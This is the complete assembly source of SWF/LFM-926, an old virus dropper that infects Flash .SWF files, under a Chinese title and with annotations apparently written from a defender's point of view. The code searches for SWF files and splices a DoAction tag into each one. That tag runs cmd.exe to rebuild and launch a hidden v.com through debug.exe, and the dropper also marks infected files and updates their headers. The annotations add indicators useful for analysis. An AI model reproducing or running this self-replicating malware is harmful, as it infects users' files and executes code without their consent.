
国外的第一只flash病毒的源代码

SWF/LFM-926 Virus:
; ------------------
; Description: WinNT/XP Virus dropper for Flash .SWF files!
; Masm Version 6.11: ML.EXE SWF.ASM
; Virus Size: 926 bytes
; Infection Size: 3247 bytes.
; Last Edit: 01/08/2002

; --------------------------------- Begin Source Code ---------------
; Analysis notes (defender's reading of this listing):
; - 16-bit DOS .COM image (".model tiny", "org 100h"); every file and memory
;   operation goes through DOS INT 21h, so the dropper only runs where a
;   16-bit DOS subsystem exists (NTVDM on 32-bit WinNT/XP per the header;
;   absent on 64-bit Windows hosts).
; - Per run: enumerate "*.SWF" in the current directory and, for each
;   uncompressed ("FWS") file not yet marked, splice a DoAction tag carrying a
;   hex dump of this body (formatted as a debug.exe script) directly after
;   the SWF header, then mark the file.
; - Host-side indicators grounded in the data below: SWF version byte 099h,
;   the strings 'FSCommand:exec', 'cmd.exe', 'debug.exe' and 'v.com' inside
;   the movie, and a hidden file named v.com next to the infected movies.
; - Register conventions are the DOS ones (ah = function, bx = handle,
;   cx/dx = count/pointer, CF = error); comments below name the service used.
.286
.model tiny
.code
org 100h

Entry: jmp Start ; Skip the data area; Entry..Virus_End is the image that gets hex-dumped.

VIR_SIZE equ Virus_End-Entry ; Byte length of the whole body (926 = 39Eh; see the '39E' string in DROP_END).

DTA db 128 dup(0) ; DOS Disk Transfer Area; offset DTA+30 = ASCIIZ filename filled by FindFirst/FindNext
HANDLE dw ? ; Handle to host file
PTR1 dd 0 ; Far pointer to the block holding the host's original tag stream; offset stays 0, only the segment word is written
PATH db "*.SWF",0 ; File mask (no directory part: only the current directory is searched)
BINARY db "v.com",0 ; Name of the dropped binary; ExProg sets its hidden attribute before exit
HEX db "0123456789ABCDEF" ; Binary to hex lookup table (indexed via xlat)

; Flash header block (first 8 bytes of the host SWF, read verbatim).
; -------------------
SIGN_FW dw ? ; Signature bytes 1-2 'F','W' (compared as the little-endian word 'WF')
SIGN_S db ? ; Signature byte 3 'S' = uncompressed; zlib 'CWS' files fail the check and are skipped
VERSION_NUM db ? ; SWF version byte; set to 099h on infection and used as the "already infected" marker
FILE_LENGTH dw ? ; Low word of the SWF uncompressed length
dw ? ; High word of the length; never consulted, so only the low 16 bits drive the read/alloc/patch sizes below
STATIC_HDR_SIZE equ $-SIGN_FW ; = 8

RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isn't static. ;(
; The 20 bytes after the fixed header: frame-size RECT, frame rate, frame count,
; then the first tag(s). Only used to locate the first tag; see the scan at 'next'.
RECT_BUF_SIZE equ $-RECT_BUF

HDR_SIZE dw ? ; Holds the true header size! (= STATIC_HDR_SIZE + offset of the SetBackgroundColor tag in RECT_BUF)

; Start of Viral Frame 0.
; -----------------------
; Layout of the injected tag: DROP_BEGIN, then N copies of DROP_MIDDLE (one
; per 24 body bytes, plus a shorter remainder line), then DROP_END+END_TAG.
; The string carried by ActionGetURL is the cmd.exe line
;   echo Loading.Flash.Movie...&(echo n v.com&echo a 100&echo db XX,..&...&echo rcx&echo 39E&echo w&echo q)|debug.exe>nul&start /b v.com
; with 09h standing in for each space.
DROP_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes! (tag header word 033Fh: code 12, length field 3Fh = long form)
TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG] ; low word of the long tag length, patched after the dump is written
dw 0 ; high word of the long tag length (always 0)
db 083h ; ActionGetUrl Tag (action codes >= 080h carry a 16-bit length next)
ACTION_LENGTH dw 0 ; (DROP_BEGIN_SIZE-9)+(SUM OF DROP_MIDDLE)+(DROP_END_SIZE) ; accumulated in ToHex and the remainder write
db 'FSCommand:exec' ; NOTE(review): 'exec' was historically honoured by the standalone player/projector only - confirm for the player in scope
db 000h
db 'cmd.exe'
db 009h ; chr(9) is Flash code for a space character.
db '/c'
db 009h
db 'echo'
db 009h
db 'Loading.Flash.Movie...'
db '&'
db '(echo'
db 009h
db 'n'
db 009h
db 'v.com&echo'
db 009h
db 'a'
db 009h
db '100&'
DROP_BEGIN_SIZE equ $-DROP_BEGIN

DROP_MIDDLE db 'echo' ; One debug.exe "db" line; the 'echo',09h,'db',09h prefix is 8 bytes long
db 009h
db 'db'
db 009h
db 71 dup(',') ; db XX,...,XX where XX's are viral hex codes. (24 bytes * "XX," - trailing comma = 71 chars)
db '&'
DROP_MIDDLE_SIZE equ $-DROP_MIDDLE

DROP_END db '&echo.&echo' ; Leading '&' also terminates the short remainder line, which is written without its own '&'
db 009h
db 'rcx&echo'
db 009h
db '39E' ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes. (39Eh = 926, the size stated in the header)
db '&echo'
db 009h
db 'w&echo'
db 009h
db 'q)|debug.exe>nul&start'
db 009h
db '/b'
db 009h
db 'v.com'
db 000h ; StringEnd Tag
DROP_END_SIZE equ $-DROP_END

; End of Viral Frame 0.
; ---------------------
END_TAG db 001h ; Action code 0x01 = tagshowframe Tag (written together with DROP_END, see DROP_END_SIZE+1 below)

Start:
; Shrink the .COM's memory block to 2*ceil(VIR_SIZE/16) paragraphs, presumably so
; that INT 21h/48h below has free memory to hand out.
mov ax,(VIR_SIZE+0fh)
shr ax,4
shl ax,1
mov bx,ax ; Allocate (VirusSize*2)
mov ah,4ah
int 21h ; Resize block
jc ExProg

mov dx,offset DTA ; Set DTA operation
mov ah,1ah
int 21h

mov cx,07h ; Attribute filter: read-only|hidden|system files are included in the search
mov dx,offset PATH
mov ah,4eh ; FindFirst
int 21h
jc ExProg
jmp Infect
Cycle: ; Next match; reached after each file, whether infected or skipped
mov dx,offset PATH
mov ah,4fh ; FindNext
int 21h
jc ExProg
jmp Infect
ExProg: ; Exit path, also taken on any DOS error (open handle / allocated block are left for DOS to reclaim at 4Ch)
mov ax,4301h ; Hide v.com (43h/01 = set attributes; cx=02h = hidden)
mov cx,02h
mov dx,offset BINARY
int 21h

mov ax,4c00h ; End program
int 21h
Infect:
; Writes '$' 12 bytes past the DTA filename. FindFirst already returns the name
; NUL-terminated as 3Dh requires, so the purpose is unclear (possibly a leftover
; from a 09h display-string call).
mov byte ptr DTA[30+12],'$'
mov dx,offset (DTA+30)

mov ax,3d02h ; Open host file (access mode 2 = read/write)
int 21h
jc ExProg

mov [HANDLE],ax ; Save file handle

mov ax,3f00h ; Read file Header (8 fixed bytes + 20 bytes of RECT/rate/count/first tag)
mov dx,offset SIGN_FW
mov bx,[HANDLE]
mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE)
int 21h
jc ExProg

cmp word ptr SIGN_FW,'WF' ; Check for a valid Flash SWF file.
jne Cycle ; Try another file ...
cmp byte ptr SIGN_S,'S'
jne Cycle
cmp byte ptr VERSION_NUM,099h ; Already infected? (detection: version byte 099h is this sample's marker)
je Cycle

; Scan RECT_BUF for the SetBackgroundColor tag header 0243h (code 9, length 3),
; stored little-endian as 43h,02h. Its index fixes HDR_SIZE; hosts where it is
; not within the first 20 bytes after the fixed header are skipped.
mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag.
xor di,di ; Seems to always exist directly after the header.
next: cmp byte ptr RECT_BUF[di],043h
jne not_found
cmp byte ptr RECT_BUF[di+1],002h
jne not_found
jmp found
not_found:
inc di
loop next
jmp Cycle
found:
mov word ptr HDR_SIZE,STATIC_HDR_SIZE
add word ptr HDR_SIZE,di ; Compute the header size

mov ax,4200h ; Reset file ptr right after Flash header (42h/00 = seek from start, cx:dx = offset)
xor cx,cx
mov dx,[HDR_SIZE]
int 21h
jc ExProg

; bx still holds the file handle; 48h takes the paragraph count in bx, hence the push/pop.
push bx
mov ax,word ptr FILE_LENGTH ; low word only
add ax,15
shr ax,4
mov bx,ax
mov ah,48h ; Allocate memory for target host file (ceil(FILE_LENGTH/16) paragraphs)
int 21h
pop bx
jc ExProg
mov word ptr PTR1[2],ax ; Save pointer to allocated block

; Copy everything after the header (FILE_LENGTH-HDR_SIZE bytes) into the new
; block; ds is switched by lds for the call and restored afterwards.
mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ah,3fh ; Read host file into memory block
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg

; Seek to HDR_SIZE+DROP_BEGIN_SIZE: the DROP_BEGIN bytes are skipped here and
; written last (see the final write), once TAG_LENGTH/ACTION_LENGTH are known.
mov ax,4200h ; Reset file ptr to the middle code section
xor cx,cx
mov dx,[HDR_SIZE]
add dx,DROP_BEGIN_SIZE
int 21h
jc ExProg

;
; The following code is a key technique. It simply converts the
; virus from binary to hex characters and then inserts them into the host
; using a standard format that DEBUG.EXE expects! Flash only really
; allows plain text, so this satisfies that condition.
;
; Register roles in ToHex:
;   si = index of the body byte being converted (Entry[si])
;   di = character offset within the current hex line (3 per byte: "XX,")
;   cx = body bytes remaining
;   bx = HEX table base for xlat; reloaded every pass because bl is reused as the divisor 24
;   bx (handle) is preserved across the loop by the push/pop pair around it

mov word ptr ACTION_LENGTH,(DROP_BEGIN_SIZE-9+DROP_END_SIZE)
push bx
mov cx,VIR_SIZE
xor si,si
xor di,di
ToHex:
mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber
mov al,byte ptr Entry[si]
mov ah,al ; keep a copy of the byte in ah
and al,00001111y
xlat ; al = hex digit of the low nibble
; STATIC_HDR_SIZE (8) is reused here only because the 'echo',09h,'db',09h
; prefix of DROP_MIDDLE happens to be 8 bytes; it is not a header offset.
mov DROP_MIDDLE[STATIC_HDR_SIZE+di+1],al
shr ax,12 ; moves the high nibble of the saved byte (ah) into al
xlat ; al = hex digit of the high nibble
mov DROP_MIDDLE[STATIC_HDR_SIZE+di],al
inc si
inc di
inc di
inc di
mov ax,si
mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line.
div bl ; ah = si mod 24
or ah,ah
jnz cont
; Every 24th byte: flush one full "echo db XX,...,XX&" line to the host.
push cx
xor di,di
add word ptr ACTION_LENGTH,DROP_MIDDLE_SIZE
mov bx,[HANDLE] ; Write hex dump entry XX,...,XX
mov dx,offset DROP_MIDDLE
mov cx,DROP_MIDDLE_SIZE
mov ax,4000h
int 21h
jc ExProg
pop cx
cont:
loop ToHex
pop bx ; bx = file handle again

or di,di
jz no_remainder

; Remainder line: cx = di+7 = 8 (prefix) + 3*n - 1, i.e. the last comma is dropped;
; the separating '&' is supplied by DROP_END's first byte.
mov dx,offset DROP_MIDDLE
mov cx,di
add cx,7 ; STATIC_HDR_SIZE-1
add word ptr ACTION_LENGTH,cx
mov ax,4000h ; Write remainder hex dump entry XX,...,XX
int 21h
jc ExProg

no_remainder:
mov dx,offset DROP_END
mov cx,DROP_END_SIZE+1 ; +1 covers END_TAG, which follows DROP_END in memory
mov ax,4000h ; Write end code and end of frame tag(01) into host
int 21h
jc ExProg

mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ax,4000h ; Write host code directly after viral code.
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg
; Patch the header with new viral values.
; TAG_LENGTH = ACTION_LENGTH+4; FILE_LENGTH (low word) += TAG_LENGTH+6.
mov cx,word ptr ACTION_LENGTH
add cx,4
mov word ptr TAG_LENGTH,cx
add cx,6
add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6)
; Set infection marker
mov byte ptr VERSION_NUM,099h

mov di,[HDR_SIZE]
inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1 (the frame-count word is the last header field before the first tag)

mov ax,4200h ; Re-wind to start of file
xor cx,cx
xor dx,dx
int 21h
jc ExProg

mov dx,offset SIGN_FW
mov cx,[HDR_SIZE]
mov ax,4000h ; Write updated viral header (file ptr now = HDR_SIZE)
int 21h
jc ExProg

mov dx,offset DROP_BEGIN
mov cx,DROP_BEGIN_SIZE
mov ax,4000h ; Write begin code into host (fills the gap skipped before the hex dump)
int 21h
jc ExProg

mov ah,49h ; Free memory block (49h takes the segment in es)
mov es,word ptr PTR1[2]
int 21h
jc ExProg

mov ax,3e00h ; Close file
int 21h
jc ExProg

jmp Cycle ; DONE! Try to infect another.

Virus_End:
end Entry
; --------------------------------- End Source Code ------------------
